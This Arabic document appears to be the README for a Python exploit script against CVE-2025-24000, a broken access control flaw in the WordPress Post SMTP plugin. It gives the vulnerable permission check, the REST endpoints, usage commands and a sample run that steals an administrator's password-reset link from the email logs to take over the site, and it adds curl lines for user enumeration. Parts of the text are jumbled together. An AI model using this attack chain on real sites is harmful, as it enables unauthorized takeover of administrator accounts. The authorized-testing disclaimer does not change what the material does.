
نص بايثون قصير لاستغلال CVE-2025–24000 بناءً على هذه المقالة: https://medium.com/@security_56355/from-subscriber-to-admin-reproducing-cve-2025-24000-in-wordpress-post-smtp-plugin-8105ff85e274
يستغل هذا السكريبت CVE-2025-24000، وهي ثغرة عالية الخطورة من نوع التحكم المكسور في الوصول في إضافة Post SMTP لووردبريس (الإصدارات ≤ 3.2.0). تسمح لأي مستخدم مصادق بحساب منخفض الصلاحيات (مثل مشترك) بالوصول إلى سجلات البريد الإلكتروني لواجهة برمجة التطبيقات REST الخاصة بالإضافة، وسرقة رابط إعادة تعيين كلمة مرور المسؤول، والسيطرة على حساب المسؤول.
تنبع الثغرة من فحص صلاحيات معطل في REST API الخاصة بالإضافة:
// Vulnerable code (≤ 3.2.0)
public function get_logs_permission() {
return is_user_logged_in();
}
أي مستخدم مسجل الدخول، بغض النظر عن دوره، يمكنه الوصول إلى نقاط النهاية المخصصة للمسؤولين فقط:
GET /wp-json/psd/v1/get-logsGET /wp-json/psd/v1/get-details?id=<id>&type=show_viewPOST /wp-json/psd/v1/resend-email/wp-admin//wp-admin كمسؤولrequests library (pip install requests)python3 exploit_cve_2025_24000.py \
--url <wordpress_base_url> \
--username <your_subscriber_username> \
--password <your_subscriber_password> \
--email <admin_username_or_email>
| الوسيط | الوصف |
|---|
python3 exploit_cve_2025_24000.py \
--url http://samurai.local/samurai/ \
--username attacker \
--password Password1 \
--email shogun
[*] Logging in as attacker...
[+] Logged in successfully as attacker
[*] Fetching WP REST nonce from wp-admin...
[+] Got nonce: a5f398e081
[*] Triggering password reset for: shogun
[+] Password reset triggered.
[*] Fetching email logs...
[+] Got logs response.
[*] Checking 1 email(s) for reset link...
[+] RESET LINK FOUND:
http://samurai.local/samurai/wp-login.php?action=rp&key=XXXXXXXXXXXX&login=shogun
[*] Visit the link above to set a new admin password and take over the site.
curl -s 'http://target.local/wp-json/wp/v2/users' | python3 -m json.tool
curl -s 'http://target.local/?author=1' -I | grep -i location
هذه الأداة مخصصة لاختبار الاختراق المصرح به والأغراض التعليمية فقط. لا تستخدمها ضد أنظمة ليس لديك إذن صريح لاختبارها.
--url | الرابط الأساسي لموقع ووردبريس (مثل http://target.local/wordpress/) |
--username | اسم المستخدم لووردبريس منخفض الصلاحيات |
--password | كلمة مرور المستخدم منخفض الصلاحيات |
--email | اسم المستخدم أو البريد الإلكتروني للمسؤول لإعادة التعيين |